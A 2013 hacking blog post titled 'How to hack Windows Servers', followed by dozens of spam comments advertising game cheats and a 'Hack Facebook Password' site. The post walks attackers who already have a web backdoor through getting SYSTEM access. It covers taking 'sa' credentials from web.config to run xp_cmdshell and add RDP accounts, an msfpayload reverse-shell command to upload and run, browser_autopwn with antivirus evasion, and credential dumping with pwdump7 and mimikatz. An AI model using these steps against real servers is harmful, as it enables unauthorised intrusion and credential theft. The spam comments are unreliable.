Warning - This Website is only for education purposes, By reading these articles you agree that HackingBytes is not responsible in any way for any kind of damage caused by the information provided in these articles.

Wednesday, May 1, 2013

How to hack Windows Servers

Hacking Windows Servers  

By:Rafay


Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks.

But, these get the job done only on Linux servers. What about windows servers?

Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges.
  • Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure.
  • Using meterpreter payload to get a reverse shell over the target machine.
  • Using browser_autopwn. (Really...)
  • Using other tools like pwdump7, mimikatz, etc.

Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.
1. Using xp_cmdshell-

Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work.
If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website.
You must be wondering why only "sa"?
Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server.
The picture below shows the connection string containing login credentials of "sa" account.


Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.
So, after getting the "sa" account, we can login remotely using HeidiSQL
HeidiSQL is an awesome tool to connect to remote database servers. You can download it here.
After logging into MSSQL server with sa account, we get a list of databases and their contents.
Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)
Syntax for the query is-
xp_cmdshell '[command]'

For example, if I need to know my current privileges, I would query-
xp_cmdshell 'whoami'


This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy.
Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.
Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.
  
2. Meterpreter Payload-

This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands.
Using metasploit, generate a reverse shell payload binary.
For example-
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
Now we will upload this executable to the server using our web backdoor.
Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)
Now it's time to execute the payload.
If everything goes right, we will get a meterpreter session over the target machine as shown below-
We can also use php, asp or other payloads.
3. Browser Autopwn-
This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment.
Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands.
I think it is clear by now that what I'm trying to explain ;)
We can start Internet Explorer from command line and make it browse to a specific URL.
Syntax for  this-
iexplore.exe [URL]
Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.


4. Using readily available tools-
Tools like pwdump and mimikatz can crack passwords of windows users.
#pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper.
The following screenshot shows NTLM hashes from pwdump7:
#mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is some language other than English so do watch tutorials on how to use it.
Following picture shows plain text passwords from mimikatz:
You can google about them and learn how to use these tools and what actually they exploit to get the job done for you.

40 comments:

  1. What's up, its good post on the topic of media print, we all be aware of media is a enormous source of information.

    Also visit my web-site ... gsa search engine ranker

    ReplyDelete
  2. I read this post completely concerning the comparison of newest and preceding
    technologies, it's remarkable article.

    my webpage :: Mon Jervois

    ReplyDelete
  3. Hi there! This article couldn't be written much better! Looking at this article reminds me of my previous roommate! He continually kept talking about this. I'll send this
    post to him. Fairly certain he'll have a great read. Thank you for sharing!

    my web site :: World Of Tanks Hack

    ReplyDelete
  4. What a material of un-ambiguity and preserveness of precious familiarity concerning unpredicted
    feelings.

    My web-site :: League Of legends hack

    ReplyDelete
  5. Hello there, You have done an excellent job. I'll certainly digg it and personally suggest to my friends. I am confident they'll be
    benefited from this website.

    Feel free to surf to my homepage :: World of tanks hack

    ReplyDelete
  6. It's amazing to pay a quick visit this web site and reading the views of all colleagues regarding this post, while I am also zealous of getting experience.

    my site - Install 7Zip

    ReplyDelete
  7. Good way of describing, and good piece of writing
    to get data regarding my presentation topic, which i am going to convey in institution of higher education.


    Look into my weblog ... Minecraft Crack

    ReplyDelete
  8. Wе're a gaggle of volunteers and opening a brand new scheme in our community. Your website provided us with useful information to work on. You've
    done an impreѕsіve jοb аnԁ
    our entire cοmmunity will liκelу be gгateful
    to you.

    Feel fгee to viѕit my web site world of tаnkѕ cheat **

    ReplyDelete
  9. I am regular visitor, how are you everybody? This paragraph posted
    at this web site is really good.

    My page ... Code Psn Gratuit

    ReplyDelete
  10. I think that what you said was actually very reasonable.

    However, consider this, suppose you were to write a awesome
    headline? I am not suggesting your content is not good, however suppose you added something to maybe get a
    person's attention? I mean "How to hack Windows Servers" is a little plain. You might peek at Yahoo's home page and watch how they write post
    headlines to get viewers to click. You might try adding a video or
    a picture or two to get readers interested about what you've got to say. In my opinion, it would bring your blog a little bit more interesting.

    Feel free to surf to my page :: Psn Code Generator

    ReplyDelete
  11. What's up friends, how is everything, and what you would like to say concerning this post, in my view its genuinely amazing for me.

    Look at my weblog: Psn Code Generator

    ReplyDelete
  12. Do you mind if I quote a couple of your posts as long as I provide credit and sources back to your blog?
    My blog is in the very same area of interest as yours and my visitors
    would really benefit from some of the information you present here.
    Please let me know if this okay with you. Regards!


    Also visit my web-site; Minecraft Gift Code Generator

    ReplyDelete
  13. I have read several excellent stuff here. Certainly price bookmarking
    for revisiting. I wonder how a lot attempt you place to create this type of magnificent informative website.



    Feel free to visit my site: Minecraft Gift Code Generator

    ReplyDelete
  14. Have you ever considered creating an e-book or guest authoring on other blogs?

    I have a blog based upon on the same topics you discuss and would really like to have you share
    some stories/information. I know my subscribers would appreciate your work.
    If you are even remotely interested, feel free to shoot me an e-mail.


    Feel free to surf to my page - Minecraft Gift Code Generator

    ReplyDelete
  15. After I originally commented I appear to have clicked on the -Notify me when
    new comments are added- checkbox and now every time a comment is added I recieve four emails with the exact same comment.
    There has to be an easy method you can remove me from that service?
    Kudos!

    Also visit my web page free microsoft points

    ReplyDelete
  16. I'm extremely inspired along with your writing talents as well as with the layout on your blog. Is this a paid topic or did you modify it your self? Anyway keep up the excellent high quality writing, it is rare to peer a great blog like this one today..

    My page - Code Psn Gratuit

    ReplyDelete
  17. What's up everybody, here every person is sharing these kinds of know-how, therefore it's good to read this webpage, and I used
    to pay a quick visit this website every day.

    my homepage; free Microsoft points

    ReplyDelete
  18. I’m not that much of a online reader to be honest but your blogs really nice, keep it up!
    I'll go ahead and bookmark your site to come back later on. Many thanks

    my webpage ... Telecharger minecraft gratuit

    ReplyDelete
  19. What's Happening i'm new to this, I stumbled upon this I have found It absolutely helpful and it has
    aided me out loads. I hope to give a contribution & help different customers
    like its aided me. Great job.

    Also visit my web site; Telecharger Minecraft Gratuit

    ReplyDelete
  20. I loved as much as you'll receive carried out right here. The sketch is tasteful, your authored subject matter stylish. nonetheless, you command get bought an shakiness over that you wish be delivering the following. unwell unquestionably come more formerly again since exactly the same nearly a lot often inside case you shield this increase.

    Stop by my blog: Telecharger Minecraft Gratuit

    ReplyDelete
  21. It's remarkable to visit this web page and reading the views of all mates regarding this post, while I am also keen of getting knowledge.

    My page - Telecharger Minecraft Gratuit

    ReplyDelete
  22. Hi there Dear, are you actually visiting this web page on a regular basis, if so after that you
    will absolutely take nice knowledge.

    Here is my web blog - Telecharger Minecraft Gratuit

    ReplyDelete
  23. Good post. I learn something new and challenging on blogs I stumbleupon on a daily basis.
    It will always be interesting to read through content
    from other writers and use a little something from
    their web sites.

    my web page - ps3 jailbreak 2

    ReplyDelete
  24. Post writing is also a fun, if you be acquainted with then you can write otherwise it is complex to write.


    Feel free to visit my web site - Ps3 3.56 jailbreak

    ReplyDelete
  25. These are really impressive ideas in on the topic
    of blogging. You have touched some nice things here. Any way keep up wrinting.


    Feel free to surf to my site ... code Psn Gratuit

    ReplyDelete
  26. Hey there! Do you know if they make any plugins to protect
    against hackers? I'm kinda paranoid about losing everything I've worked hard on.
    Any recommendations?

    Here is my weblog ... Code psn gratuit

    ReplyDelete
  27. If some one desires expert view regarding blogging after that i propose
    him/her to go to see this weblog, Keep up the good job.


    Also visit my webpage brooklyn Bridal Gown

    ReplyDelete
  28. Why viewers still use to read news papers when in this technological globe the whole thing is available on web?


    Also visit my blog Dragon City Cheat Engine

    ReplyDelete
  29. Appreciate the recommendation. Let me try it out.

    My blog: dragon city hack (youtube.com)

    ReplyDelete
  30. Howdy! I know this is kind of off topic but I was wondering which blog
    platform are you using for this website? I'm getting fed up of Wordpress because I've had problems
    with hackers and I'm looking at options for another platform. I would be awesome if you could point me in the direction of a good platform.

    Feel free to surf to my blog post :: Dragon City Cheat Engine

    ReplyDelete
  31. Hi! Do you know if they make any plugins to protect against hackers?
    I'm kinda paranoid about losing everything I've worked hard on.
    Any recommendations?

    My web page :: ps3 jailbreak tutorial

    ReplyDelete
  32. My coder is trying to convince me to move to .net from PHP.
    I have always disliked the idea because of the expenses.
    But he's tryiong none the less. I've been using WordPress
    on a number of websites for about a year and am nervous about switching to another
    platform. I have heard very good things about blogengine.
    net. Is there a way I can transfer all my wordpress content into it?
    Any kind of help would be really appreciated!


    Feel free to visit my page - Dragon City Cheat Engine

    ReplyDelete
  33. Spot on with this write-up, I seriously think this
    amazing site needs much more attention. I'll probably be back again to read through more, thanks for the info!

    Feel free to visit my site: Dragon City Cheat Engine

    ReplyDelete
  34. Hi! I've been reading your weblog for a long time now and finally got the courage to go ahead and give you a shout out from Kingwood Texas! Just wanted to tell you keep up the good work!

    My blog; Dragon City Cheat Engine

    ReplyDelete
  35. Good article. I'm dealing with many of these issues as well..

    my website ps3 jailbreak

    ReplyDelete
  36. Aw, this was an exceptionally good post. Taking a few minutes and actual effort to generate a
    really good article… but what can I say… I procrastinate
    a whole lot and don't manage to get anything done.

    My homepage: ps3 jailbreak :: ::

    ReplyDelete
  37. Hi colleagues, its enormous paragraph on the topic of teachingand entirely explained, keep it up all the time.


    Also visit my web-site; Psn Code Generator

    ReplyDelete
  38. When some one searches for his essential thing, thus he/she desires to be available that in
    detail, thus that thing is maintained over here.

    Feel free to surf to my web blog: Hack Facebook Password

    ReplyDelete
  39. Hi there! I could have sworn I've been to your blog before but after looking at some of the articles I realized it's new to me.
    Anyhow, I'm definitely delighted I came across it and I'll be book-marking it and checking back often!


    Check out my web page ... how to get Rid of stretch marks

    ReplyDelete
  40. As the admin of this site is working, no question very rapidly it will
    be famous, due to its quality contents.

    My web blog woodwork ()

    ReplyDelete

LinkWithin

Related Posts Plugin for WordPress, Blogger...